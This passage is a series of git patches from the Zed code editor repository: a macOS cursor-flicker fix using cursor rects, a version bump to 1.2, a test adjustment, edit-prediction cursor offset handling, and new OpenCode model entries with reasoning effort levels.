std::fs::read_to_string(&valid_path).unwrap(); + + // Make sure project 1 and project 2 are in the train set, and project 3 is in the valid set. 
+ let mut train_ids: Vec = train_content + .lines() + .map(|l| { + serde_json::from_str::(l).unwrap()["id"] + .as_u64() + .unwrap() + }) + .collect(); + let mut valid_ids: Vec = valid_content + .lines() + .map(|l| { + serde_json::from_str::(l).unwrap()["id"] + .as_u64() + .unwrap() + }) + .collect(); + + train_ids.sort(); + valid_ids.sort(); + + assert_eq!(train_ids, vec![1, 2, 4, 5]); + assert_eq!(valid_ids, vec![3, 6, 7, 8]); + } } From 814f1fc06ad9897841b487a021c6766484be8cac Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Tue, 28 Apr 2026 15:12:13 +0200 Subject: [PATCH 075/231] Fix macOS mouse cursor flicker (#55068) #48029 introduced `set_document_path` which is frequently (we are also working on a PR to make it less frequent) called as tabs and panes update. Apparently, the AppKit function it uses (`NSWindow::setRepresentedFilename`) can cause the current cursor style to be reset, producing flicker as the cursor would change to `Arrow` temporarily until the right cursor style is set again in the next frame. This PR reworks how we set the cursor to use AppKit's `resetCursorRects`, giving us a chance to re-set the cursor when the OS decides to invalidate it. Finally, it fixes a separate bug introduced in #50827 where moving the mouse while typing in an editor would cause to the cursor to flicker between `None` (hidden) -> `Arrow` -> `IBeam`. This was caused by incorrectly resetting the cursor to `Arrow` when the last input came from the keyboard. 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --------- Co-authored-by: Bennet Bo Fenner --- crates/gpui/src/window.rs | 24 +++++- crates/gpui_macos/src/platform.rs | 48 +----------- crates/gpui_macos/src/window.rs | 120 ++++++++++++++++++++++++++++-- 3 files changed, 138 insertions(+), 54 deletions(-) diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index 4606ee8a5b8874..4cea82bde7aefb 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -601,6 +601,22 @@ impl HitboxId { if window.last_input_was_keyboard() { return false; } + self.hit_test(window) + } + + /// Checks if the hitbox with this ID is currently hovered, regardless of the last + /// input modality used. + /// + /// See [`HitboxId::is_hovered`] for more details. 
+ pub(crate) fn is_hovered_ignoring_last_input(self, window: &Window) -> bool { + // If this hitbox has captured the pointer, it's always considered hovered + if window.captured_hitbox == Some(self) { + return true; + } + self.hit_test(window) + } + + fn hit_test(self, window: &Window) -> bool { let hit_test = &window.mouse_hit_test; for id in hit_test.ids.iter().take(hit_test.hover_hitbox_count) { if self == *id { @@ -877,9 +893,11 @@ impl Frame { .rev() .fold_while(None, |style, request| match request.hitbox_id { None => Done(Some(request.style)), - Some(hitbox_id) => Continue( - style.or_else(|| hitbox_id.is_hovered(window).then_some(request.style)), - ), + Some(hitbox_id) => Continue(style.or_else(|| { + hitbox_id + .is_hovered_ignoring_last_input(window) + .then_some(request.style) + })), }) .into_inner() } diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index 9444be19d7ef81..fa37597065fb17 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -1,6 +1,7 @@ use crate::{ BoolExt, MacDispatcher, MacDisplay, MacKeyboardLayout, MacKeyboardMapper, MacWindow, events::key_to_native, ns_string, pasteboard::Pasteboard, renderer, + set_active_window_cursor_style, }; use anyhow::{Context as _, anyhow}; use block::ConcreteBlock; @@ -979,52 +980,7 @@ impl Platform for MacPlatform { /// in macOS's [NSCursor](https://developer.apple.com/documentation/appkit/nscursor). 
fn set_cursor_style(&self, style: CursorStyle) { unsafe { - if style == CursorStyle::None { - let _: () = msg_send![class!(NSCursor), setHiddenUntilMouseMoves:YES]; - return; - } - - let new_cursor: id = match style { - CursorStyle::Arrow => msg_send![class!(NSCursor), arrowCursor], - CursorStyle::IBeam => msg_send![class!(NSCursor), IBeamCursor], - CursorStyle::Crosshair => msg_send![class!(NSCursor), crosshairCursor], - CursorStyle::ClosedHand => msg_send![class!(NSCursor), closedHandCursor], - CursorStyle::OpenHand => msg_send![class!(NSCursor), openHandCursor], - CursorStyle::PointingHand => msg_send![class!(NSCursor), pointingHandCursor], - CursorStyle::ResizeLeftRight => msg_send![class!(NSCursor), resizeLeftRightCursor], - CursorStyle::ResizeUpDown => msg_send![class!(NSCursor), resizeUpDownCursor], - CursorStyle::ResizeLeft => msg_send![class!(NSCursor), resizeLeftCursor], - CursorStyle::ResizeRight => msg_send![class!(NSCursor), resizeRightCursor], - CursorStyle::ResizeColumn => msg_send![class!(NSCursor), resizeLeftRightCursor], - CursorStyle::ResizeRow => msg_send![class!(NSCursor), resizeUpDownCursor], - CursorStyle::ResizeUp => msg_send![class!(NSCursor), resizeUpCursor], - CursorStyle::ResizeDown => msg_send![class!(NSCursor), resizeDownCursor], - - // Undocumented, private class methods: - // https://stackoverflow.com/questions/27242353/cocoa-predefined-resize-mouse-cursor - CursorStyle::ResizeUpLeftDownRight => { - msg_send![class!(NSCursor), _windowResizeNorthWestSouthEastCursor] - } - CursorStyle::ResizeUpRightDownLeft => { - msg_send![class!(NSCursor), _windowResizeNorthEastSouthWestCursor] - } - - CursorStyle::IBeamCursorForVerticalLayout => { - msg_send![class!(NSCursor), IBeamCursorForVerticalLayout] - } - CursorStyle::OperationNotAllowed => { - msg_send![class!(NSCursor), operationNotAllowedCursor] - } - CursorStyle::DragLink => msg_send![class!(NSCursor), dragLinkCursor], - CursorStyle::DragCopy => msg_send![class!(NSCursor), 
dragCopyCursor], - CursorStyle::ContextualMenu => msg_send![class!(NSCursor), contextualMenuCursor], - CursorStyle::None => unreachable!(), - }; - - let old_cursor: id = msg_send![class!(NSCursor), currentCursor]; - if new_cursor != old_cursor { - let _: () = msg_send![new_cursor, set]; - } + set_active_window_cursor_style(style); } } diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index d6e1d296ac7cc4..b8dafbbc90bdc5 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -25,11 +25,11 @@ use cocoa::{ }; use dispatch2::DispatchQueue; use gpui::{ - AnyWindowHandle, BackgroundExecutor, Bounds, Capslock, ExternalPaths, FileDropEvent, - ForegroundExecutor, KeyDownEvent, Keystroke, Modifiers, ModifiersChangedEvent, MouseButton, - MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, PlatformAtlas, PlatformDisplay, - PlatformInput, PlatformInputHandler, PlatformWindow, Point, PromptButton, PromptLevel, - RequestFrameOptions, SharedString, Size, SystemWindowTab, WindowAppearance, + AnyWindowHandle, BackgroundExecutor, Bounds, Capslock, CursorStyle, ExternalPaths, + FileDropEvent, ForegroundExecutor, KeyDownEvent, Keystroke, Modifiers, ModifiersChangedEvent, + MouseButton, MouseDownEvent, MouseMoveEvent, MouseUpEvent, Pixels, PlatformAtlas, + PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow, Point, PromptButton, + PromptLevel, RequestFrameOptions, SharedString, Size, SystemWindowTab, WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowKind, WindowParams, point, px, size, }; @@ -173,6 +173,10 @@ unsafe fn build_classes() { sel!(mouseMoved:), handle_view_event as extern "C" fn(&Object, Sel, id), ); + decl.add_method( + sel!(resetCursorRects), + reset_cursor_rects as extern "C" fn(&Object, Sel), + ); decl.add_method( sel!(pressureChangeWithEvent:), handle_view_event as extern "C" fn(&Object, Sel, id), @@ -313,6 +317,35 @@ pub(crate) fn 
convert_mouse_position(position: NSPoint, window_height: Pixels) - ) } +/// Stores the cursor style on the active GPUI window and invalidates its cursor rects. +/// +/// # Safety +/// +/// This function is not thread safe. Callers must ensure this is called on the AppKit main +/// thread because it reads the active AppKit window and updates GPUI window state associated +/// with Objective-C objects. +pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { + // SAFETY: The caller guarantees AppKit main-thread access. The class check ensures the + // window has our WINDOW_STATE_IVAR before reading it. + unsafe { + let app = NSApplication::sharedApplication(nil); + let main_window: id = msg_send![app, mainWindow]; + if main_window.is_null() || !msg_send![main_window, isKindOfClass: WINDOW_CLASS] { + return; + } + + let window_state = get_window_state(&*main_window); + let mut window_state = window_state.lock(); + if window_state.cursor_style != style { + window_state.cursor_style = style; + let _: () = msg_send![ + window_state.native_window, + invalidateCursorRectsForView: window_state.native_view.as_ptr() + ]; + } + } +} + unsafe fn build_window_class(name: &'static str, superclass: &Class) -> *const Class { unsafe { let mut decl = ClassDecl::new(name, superclass).unwrap(); @@ -429,6 +462,8 @@ struct MacWindowState { native_view: NonNull, blurred_view: Option, background_appearance: WindowBackgroundAppearance, + cursor_style: CursorStyle, + cursor_hidden: bool, display_link: Option, renderer: renderer::Renderer, request_frame_callback: Option>, @@ -746,6 +781,8 @@ impl MacWindow { native_view: NonNull::new_unchecked(native_view), blurred_view: None, background_appearance: WindowBackgroundAppearance::Opaque, + cursor_style: CursorStyle::Arrow, + cursor_hidden: false, display_link: None, renderer: renderer::new_renderer( renderer_context, @@ -1767,6 +1804,79 @@ extern "C" fn dealloc_view(this: &Object, _: Sel) { } } +extern "C" fn 
reset_cursor_rects(this: &Object, _: Sel) { + // SAFETY: AppKit invokes cursor-rect updates on the main thread for GPUIView instances, + // whose WINDOW_STATE_IVAR is initialized when the view is created. The cursor registered + // below is a valid NSCursor. + unsafe { + let _: () = msg_send![super(this, class!(NSView)), resetCursorRects]; + + let window_state = get_window_state(this); + let cursor_style; + let cursor_hidden; + + { + let mut window_state = window_state.lock(); + + if matches!(window_state.cursor_style, CursorStyle::None) { + if !window_state.cursor_hidden { + let _: () = msg_send![class!(NSCursor), hide]; + window_state.cursor_hidden = true; + } + return; + } + + cursor_style = window_state.cursor_style; + cursor_hidden = window_state.cursor_hidden; + }; + + let cursor: id = match cursor_style { + CursorStyle::Arrow => msg_send![class!(NSCursor), arrowCursor], + CursorStyle::IBeam => msg_send![class!(NSCursor), IBeamCursor], + CursorStyle::Crosshair => msg_send![class!(NSCursor), crosshairCursor], + CursorStyle::ClosedHand => msg_send![class!(NSCursor), closedHandCursor], + CursorStyle::OpenHand => msg_send![class!(NSCursor), openHandCursor], + CursorStyle::PointingHand => msg_send![class!(NSCursor), pointingHandCursor], + CursorStyle::ResizeLeftRight => msg_send![class!(NSCursor), resizeLeftRightCursor], + CursorStyle::ResizeUpDown => msg_send![class!(NSCursor), resizeUpDownCursor], + CursorStyle::ResizeLeft => msg_send![class!(NSCursor), resizeLeftCursor], + CursorStyle::ResizeRight => msg_send![class!(NSCursor), resizeRightCursor], + CursorStyle::ResizeColumn => msg_send![class!(NSCursor), resizeLeftRightCursor], + CursorStyle::ResizeRow => msg_send![class!(NSCursor), resizeUpDownCursor], + CursorStyle::ResizeUp => msg_send![class!(NSCursor), resizeUpCursor], + CursorStyle::ResizeDown => msg_send![class!(NSCursor), resizeDownCursor], + + // Undocumented, private class methods: + // 
https://stackoverflow.com/questions/27242353/cocoa-predefined-resize-mouse-cursor + CursorStyle::ResizeUpLeftDownRight => { + msg_send![class!(NSCursor), _windowResizeNorthWestSouthEastCursor] + } + CursorStyle::ResizeUpRightDownLeft => { + msg_send![class!(NSCursor), _windowResizeNorthEastSouthWestCursor] + } + + CursorStyle::IBeamCursorForVerticalLayout => { + msg_send![class!(NSCursor), IBeamCursorForVerticalLayout] + } + CursorStyle::OperationNotAllowed => { + msg_send![class!(NSCursor), operationNotAllowedCursor] + } + CursorStyle::DragLink => msg_send![class!(NSCursor), dragLinkCursor], + CursorStyle::DragCopy => msg_send![class!(NSCursor), dragCopyCursor], + CursorStyle::ContextualMenu => msg_send![class!(NSCursor), contextualMenuCursor], + CursorStyle::None => unreachable!(), + }; + + if cursor_hidden { + let _: () = msg_send![class!(NSCursor), unhide]; + window_state.lock().cursor_hidden = false; + } + + let bounds = NSView::bounds(this as *const Object as id); + let _: () = msg_send![this, addCursorRect: bounds cursor: cursor]; + } +} + extern "C" fn handle_key_equivalent(this: &Object, _: Sel, native_event: id) -> BOOL { handle_key_event(this, native_event, true) } From 3ce9c384c70924f075457816180fe6c69562fc28 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Tue, 28 Apr 2026 09:53:33 -0400 Subject: [PATCH 076/231] Bump Zed to v1.2 (#55081) Release Notes: - N/A --- Cargo.lock | 2 +- crates/zed/Cargo.toml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 5163528b0550f3..bc4e9dbf460b81 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -22364,7 +22364,7 @@ dependencies = [ [[package]] name = "zed" -version = "1.1.0" +version = "1.2.0" dependencies = [ "acp_thread", "acp_tools", diff --git a/crates/zed/Cargo.toml b/crates/zed/Cargo.toml index b77125796ab3ec..0374f6ec605651 100644 --- a/crates/zed/Cargo.toml +++ b/crates/zed/Cargo.toml @@ -2,7 +2,7 @@ description = "The fast, collaborative code editor." 
edition.workspace = true name = "zed" -version = "1.1.0" +version = "1.2.0" publish.workspace = true license = "GPL-3.0-or-later" authors = ["Zed Team "] From 8c501ef8544b3894705bafd832325f26656d9415 Mon Sep 17 00:00:00 2001 From: Kirill Bulatov Date: Tue, 28 Apr 2026 16:55:26 +0200 Subject: [PATCH 077/231] Fix the test for non-dev test runs (#55089) Release Notes: - N/A --- crates/settings/src/settings_store.rs | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/crates/settings/src/settings_store.rs b/crates/settings/src/settings_store.rs index 0eb6a32465bbe9..5677b70b7c8e73 100644 --- a/crates/settings/src/settings_store.rs +++ b/crates/settings/src/settings_store.rs @@ -1786,11 +1786,10 @@ mod tests { #[gpui::test] fn test_default_settings_release_channel_overrides(cx: &mut App) { - assert_eq!( - *release_channel::RELEASE_CHANNEL, - release_channel::ReleaseChannel::Dev, - "tests expect the dev release channel", - ); + // The test deals with overrides and should ignore the other set-ups (Preview and Stable runs) + if *release_channel::RELEASE_CHANNEL != release_channel::ReleaseChannel::Dev { + return; + } let mut defaults: serde_json::Value = crate::parse_json_with_comments(&default_settings()).unwrap(); From fe99eb1b9f02b5c9b3a9d427b215913391d98b5a Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Tue, 28 Apr 2026 18:44:17 +0300 Subject: [PATCH 078/231] ep: Fix moving cursor to a predicted position (#55079) Starting ~3 weeks ago, `output` no longer contains the cursor marker, cloud strips it on parsing. Instead, it should return a cursor offset. 
Release Notes: - Fixed moving the cursor to a predicted position in Zeta 2 --- crates/cloud_llm_client/src/predict_edits_v3.rs | 3 +++ crates/edit_prediction/src/edit_prediction_tests.rs | 7 ++++++- crates/edit_prediction/src/zeta.rs | 13 ++++++------- 3 files changed, 15 insertions(+), 8 deletions(-) diff --git a/crates/cloud_llm_client/src/predict_edits_v3.rs b/crates/cloud_llm_client/src/predict_edits_v3.rs index 36c091a3100844..f9349628481572 100644 --- a/crates/cloud_llm_client/src/predict_edits_v3.rs +++ b/crates/cloud_llm_client/src/predict_edits_v3.rs @@ -46,6 +46,9 @@ pub struct PredictEditsV3Response { pub editable_range: Range, #[serde(default, skip_serializing_if = "Option::is_none")] pub model_version: Option, + /// Predicted cursor offset within `output`. + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_offset: Option, } #[derive(Debug, Deserialize, Serialize)] diff --git a/crates/edit_prediction/src/edit_prediction_tests.rs b/crates/edit_prediction/src/edit_prediction_tests.rs index 6cc38a875e19cf..be6ea025496ee1 100644 --- a/crates/edit_prediction/src/edit_prediction_tests.rs +++ b/crates/edit_prediction/src/edit_prediction_tests.rs @@ -2356,6 +2356,7 @@ fn model_response(request: &PredictEditsV3Request, diff_to_apply: &str) -> Predi request_id: Uuid::new_v4().to_string(), editable_range, output: new_excerpt, + cursor_offset: None, model_version: None, } } @@ -2365,6 +2366,7 @@ fn empty_response() -> PredictEditsV3Response { request_id: Uuid::new_v4().to_string(), editable_range: 0..0, output: String::new(), + cursor_offset: None, model_version: None, } } @@ -2713,6 +2715,7 @@ async fn test_edit_prediction_no_spurious_trailing_newline(cx: &mut TestAppConte output: "hello world\n".to_string(), editable_range: 0..excerpt_length, model_version: None, + cursor_offset: None, }; respond_tx.send(response).unwrap(); @@ -2771,9 +2774,10 @@ async fn test_v3_prediction_strips_cursor_marker_from_edit_text(cx: &mut TestApp respond_tx 
.send(PredictEditsV3Response { request_id: Uuid::new_v4().to_string(), - output: "hello<|user_cursor|> world".to_string(), + output: "hello world".to_string(), editable_range: 0..excerpt_length, model_version: None, + cursor_offset: Some(5), }) .unwrap(); @@ -2878,6 +2882,7 @@ async fn make_test_ep_store( editable_range: 0..req.input.cursor_excerpt.len(), output: completion_response.lock().clone(), model_version: None, + cursor_offset: None, }) .unwrap() .into(), diff --git a/crates/edit_prediction/src/zeta.rs b/crates/edit_prediction/src/zeta.rs index 6a287847fd2b0e..c2e622ea010fea 100644 --- a/crates/edit_prediction/src/zeta.rs +++ b/crates/edit_prediction/src/zeta.rs @@ -25,8 +25,7 @@ use zeta_prompt::{ParsedOutput, ZetaPromptInput}; use std::{env, ops::Range, path::Path, sync::Arc}; use zeta_prompt::{ ZetaFormat, format_zeta_prompt, get_prefill, parse_zeta2_model_output, - parsed_output_from_editable_region, prompt_input_contains_special_tokens, - stop_tokens_for_format, + prompt_input_contains_special_tokens, stop_tokens_for_format, zeta1::{self, EDITABLE_REGION_END_MARKER}, }; @@ -280,12 +279,12 @@ pub fn request_prediction_with_zeta( .await?; let request_id = EditPredictionId(response.request_id.into()); - let output_text = Some(response.output).filter(|s| !s.is_empty()); let model_version = response.model_version; - let parsed_output = parsed_output_from_editable_region( - response.editable_range, - output_text.unwrap_or_default(), - ); + let parsed_output = ParsedOutput { + new_editable_region: response.output, + range_in_excerpt: response.editable_range, + cursor_offset_in_new_editable_region: response.cursor_offset, + }; Some((request_id, Some(parsed_output), model_version, usage)) }) From 65729f4de6404a8bbd91ea7b2b86cc5826d3c051 Mon Sep 17 00:00:00 2001 From: Vlad Ionescu Date: Tue, 28 Apr 2026 19:00:27 +0300 Subject: [PATCH 079/231] opencode: Model updates + thinking levels (#54880) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 
Content-Transfer-Encoding: 8bit Leftovers after https://github.com/zed-industries/zed/pull/53651 Updated models: - **Zen**: GPT 5.5 and GPT 5.5 Pro - not tested because I don't have a Zen subscription and I stubbornly refuse to get one - **Go**: DeepSeek V4 Pro and DeepSeek V4 Flash - failing due to https://github.com/anomalyco/opencode/issues/24224 - **Go**: MiMo V2.5 and MiMo V2.5 Pro - tested, confirmed working - **Free**: Ling 2.6 Flash, [available for "a limited time"](https://x.com/opencode/status/2046717718028513694) - tested, confirmed working - **Free**: Hy3 Preview, [available until May 8](https://x.com/opencode/status/2047328981435756824) - tested, confirmed working When testing the new models and comparing with OpenCode CLI, I realized the [variants](https://opencode.ai/docs/models/#built-in-variants)/thinking effort configuration was not supported by the Zed Agent implementation. I added that for OpenCode Go models, after manually checking what each model supports in OpenCode. Reasoning levels and everything seems to work (UI looks good, model works) but I have no idea how to specifically test reasoning levels without doing a full benchmark 🤷 I did not add the same thing for OpenCode Zen models because I could not figure out a way to get the supported variants. @benbrandt let me know if you want me to take this out of this PR and to keep just the model updates! 
Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - OpenCode: add new models (GPT 5.5, DeepSeek V4, MiMo V2.5, Ling 2.6, Hy3) - OpenCode Go: add support for configurable reasoning effort levels --------- Co-authored-by: Ben Brandt --- Cargo.lock | 1 + .../language_models/src/provider/opencode.rs | 86 +++++++++++- crates/opencode/Cargo.toml | 1 + crates/opencode/src/opencode.rs | 127 ++++++++++++++++-- crates/settings_content/src/language_model.rs | 3 + docs/src/ai/llm-providers.md | 2 + 6 files changed, 201 insertions(+), 19 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index bc4e9dbf460b81..92dfd5304b5152 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -11872,6 +11872,7 @@ dependencies = [ "futures 0.3.32", "google_ai", "http_client", + "language_model_core", "schemars 1.0.4", "serde", "serde_json", diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index f8097b1798d863..6c0d4a5d3fe1b8 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -7,9 +7,10 @@ use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::{AsyncBody, HttpClient, http}; use language_model::{ ApiKeyState, AuthenticateError, EnvVar, IconOrSvg, LanguageModel, LanguageModelCompletionError, - LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, - LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, - LanguageModelRequest, LanguageModelToolChoice, RateLimiter, env_var, + LanguageModelCompletionEvent, LanguageModelEffortLevel, 
LanguageModelId, LanguageModelName, + LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, + LanguageModelProviderState, LanguageModelRequest, LanguageModelToolChoice, RateLimiter, + ReasoningEffort, env_var, }; use opencode::{ApiProtocol, OPENCODE_API_URL, OpenCodeSubscription}; pub use settings::OpenCodeAvailableModel as AvailableModel; @@ -29,6 +30,27 @@ use crate::provider::open_ai::{ OpenAiEventMapper, OpenAiResponseEventMapper, into_open_ai, into_open_ai_response, }; +fn normalize_reasoning_effort(effort: &str) -> Option { + match effort.trim().to_ascii_lowercase().as_str() { + "minimal" => Some(ReasoningEffort::Minimal), + "low" => Some(ReasoningEffort::Low), + "medium" => Some(ReasoningEffort::Medium), + "high" => Some(ReasoningEffort::High), + "max" | "xhigh" => Some(ReasoningEffort::XHigh), + _ => None, + } +} + +fn reasoning_effort_display(effort: ReasoningEffort) -> (&'static str, &'static str) { + match effort { + ReasoningEffort::Minimal => ("Minimal", "minimal"), + ReasoningEffort::Low => ("Low", "low"), + ReasoningEffort::Medium => ("Medium", "medium"), + ReasoningEffort::High => ("High", "high"), + ReasoningEffort::XHigh => ("Max", "max"), + } +} + const PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("opencode"); const PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("OpenCode"); @@ -254,6 +276,7 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { max_tokens: model.max_tokens, max_output_tokens: model.max_output_tokens, protocol, + reasoning_effort_levels: model.reasoning_effort_levels.clone(), custom_model_api_url: model.custom_model_api_url.clone(), }; let key = format!("{}/{}", subscription.id_prefix(), model.name); @@ -522,6 +545,36 @@ impl LanguageModel for OpenCodeLanguageModel { self.model.supports_images() } + fn supports_thinking(&self) -> bool { + self.model + .supported_reasoning_effort_levels() + .is_some_and(|levels| !levels.is_empty()) + } + + fn 
supported_effort_levels(&self) -> Vec { + self.model + .supported_reasoning_effort_levels() + .map(|levels| { + if levels.is_empty() { + return Vec::new(); + } + let default_index = levels.len() - 1; + levels + .into_iter() + .enumerate() + .map(|(i, effort)| { + let (name, value) = reasoning_effort_display(effort); + LanguageModelEffortLevel { + name: name.into(), + value: value.into(), + is_default: i == default_index, + } + }) + .collect() + }) + .unwrap_or_default() + } + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { match choice { LanguageModelToolChoice::Auto | LanguageModelToolChoice::Any => true, @@ -576,12 +629,17 @@ impl LanguageModel for OpenCodeLanguageModel { match self.model.protocol(self.subscription) { ApiProtocol::Anthropic => { + let mode = if self.supports_thinking() && request.thinking_allowed { + anthropic::AnthropicModelMode::AdaptiveThinking + } else { + anthropic::AnthropicModelMode::Default + }; let anthropic_request = into_anthropic( request, self.model.id().to_string(), 1.0, self.model.max_output_tokens().unwrap_or(8192), - anthropic::AnthropicModelMode::Default, + mode, ); let stream = self.stream_anthropic(anthropic_request, http_client, cx); async move { @@ -591,13 +649,21 @@ impl LanguageModel for OpenCodeLanguageModel { .boxed() } ApiProtocol::OpenAiChat => { + let reasoning_effort = if request.thinking_allowed { + request + .thinking_effort + .as_deref() + .and_then(normalize_reasoning_effort) + } else { + None + }; let openai_request = into_open_ai( request, self.model.id(), false, false, self.model.max_output_tokens(), - None, + reasoning_effort, false, ); let stream = self.stream_openai_chat(openai_request, http_client, cx); @@ -608,13 +674,21 @@ impl LanguageModel for OpenCodeLanguageModel { .boxed() } ApiProtocol::OpenAiResponses => { + let reasoning_effort = if request.thinking_allowed { + request + .thinking_effort + .as_deref() + .and_then(normalize_reasoning_effort) + } else { + None + }; let 
response_request = into_open_ai_response( request, self.model.id(), false, false, self.model.max_output_tokens(), - None, + reasoning_effort, ); let stream = self.stream_openai_response(response_request, http_client, cx); async move { diff --git a/crates/opencode/Cargo.toml b/crates/opencode/Cargo.toml index 758d2f2479b9f8..035d78d53f4d7c 100644 --- a/crates/opencode/Cargo.toml +++ b/crates/opencode/Cargo.toml @@ -21,6 +21,7 @@ anyhow.workspace = true futures.workspace = true google_ai.workspace = true http_client.workspace = true +language_model_core.workspace = true schemars = { workspace = true, optional = true } serde.workspace = true serde_json.workspace = true diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs index 9278d81677b08f..5ac344110115f7 100644 --- a/crates/opencode/src/opencode.rs +++ b/crates/opencode/src/opencode.rs @@ -1,6 +1,7 @@ use anyhow::{Result, anyhow}; use futures::{AsyncBufReadExt, AsyncReadExt, StreamExt, io::BufReader, stream::BoxStream}; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest}; +use language_model_core::ReasoningEffort; use serde::{Deserialize, Serialize}; use strum::EnumIter; @@ -76,6 +77,10 @@ pub enum Model { Claude3_5Haiku, // -- OpenAI Responses API models -- + #[serde(rename = "gpt-5.5")] + Gpt5_5, + #[serde(rename = "gpt-5.5-pro")] + Gpt5_5Pro, #[serde(rename = "gpt-5.4")] Gpt5_4, #[serde(rename = "gpt-5.4-pro")] @@ -114,6 +119,14 @@ pub enum Model { Gemini3Flash, // -- OpenAI Chat Completions protocol models -- + #[serde(rename = "deepseek-v4-pro")] + DeepSeekV4Pro, + #[serde(rename = "deepseek-v4-flash")] + DeepSeekV4Flash, + #[serde(rename = "ling-2.6-flash-free")] + Ling2_6FlashFree, + #[serde(rename = "hy3-preview-free")] + Hy3PreviewFree, #[serde(rename = "minimax-m2.5")] MiniMaxM2_5, #[serde(rename = "minimax-m2.5-free")] @@ -132,6 +145,10 @@ pub enum Model { MimoV2Pro, #[serde(rename = "mimo-v2-omni")] MimoV2Omni, + #[serde(rename = "mimo-v2.5-pro")] + 
MimoV2_5Pro, + #[serde(rename = "mimo-v2.5")] + MimoV2_5, #[serde(rename = "big-pickle")] BigPickle, #[serde(rename = "nemotron-3-super-free")] @@ -149,6 +166,7 @@ pub enum Model { max_tokens: u64, max_output_tokens: Option, protocol: ApiProtocol, + reasoning_effort_levels: Option>, custom_model_api_url: Option, }, } @@ -186,12 +204,20 @@ impl Model { | Self::Qwen3_6Plus => &[OpenCodeSubscription::Zen, OpenCodeSubscription::Go], // Go-only models - Self::MiniMaxM2_7 | Self::MimoV2Pro | Self::MimoV2Omni => &[OpenCodeSubscription::Go], + Self::MiniMaxM2_7 + | Self::MimoV2_5Pro + | Self::MimoV2_5 + | Self::MimoV2Pro + | Self::MimoV2Omni + | Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash => &[OpenCodeSubscription::Go], // Free models - Self::MiniMaxM2_5Free | Self::Nemotron3SuperFree | Self::BigPickle => { - &[OpenCodeSubscription::Free] - } + Self::MiniMaxM2_5Free + | Self::Nemotron3SuperFree + | Self::BigPickle + | Self::Ling2_6FlashFree + | Self::Hy3PreviewFree => &[OpenCodeSubscription::Free], // Custom models get their subscription from settings, not from here Self::Custom { .. 
} => &[], @@ -213,6 +239,8 @@ impl Model { Self::ClaudeHaiku4_5 => "claude-haiku-4-5", Self::Claude3_5Haiku => "claude-3-5-haiku", + Self::Gpt5_5 => "gpt-5.5", + Self::Gpt5_5Pro => "gpt-5.5-pro", Self::Gpt5_4 => "gpt-5.4", Self::Gpt5_4Pro => "gpt-5.4-pro", Self::Gpt5_4Mini => "gpt-5.4-mini", @@ -232,6 +260,10 @@ impl Model { Self::Gemini3_1Pro => "gemini-3.1-pro", Self::Gemini3Flash => "gemini-3-flash", + Self::DeepSeekV4Pro => "deepseek-v4-pro", + Self::DeepSeekV4Flash => "deepseek-v4-flash", + Self::Ling2_6FlashFree => "ling-2.6-flash-free", + Self::Hy3PreviewFree => "hy3-preview-free", Self::MiniMaxM2_5 => "minimax-m2.5", Self::MiniMaxM2_5Free => "minimax-m2.5-free", Self::Glm5 => "glm-5", @@ -241,6 +273,8 @@ impl Model { Self::MiniMaxM2_7 => "minimax-m2.7", Self::MimoV2Pro => "mimo-v2-pro", Self::MimoV2Omni => "mimo-v2-omni", + Self::MimoV2_5Pro => "mimo-v2.5-pro", + Self::MimoV2_5 => "mimo-v2.5", Self::Qwen3_5Plus => "qwen3.5-plus", Self::Qwen3_6Plus => "qwen3.6-plus", Self::BigPickle => "big-pickle", @@ -262,6 +296,8 @@ impl Model { Self::ClaudeHaiku4_5 => "Claude Haiku 4.5", Self::Claude3_5Haiku => "Claude Haiku 3.5", + Self::Gpt5_5 => "GPT 5.5", + 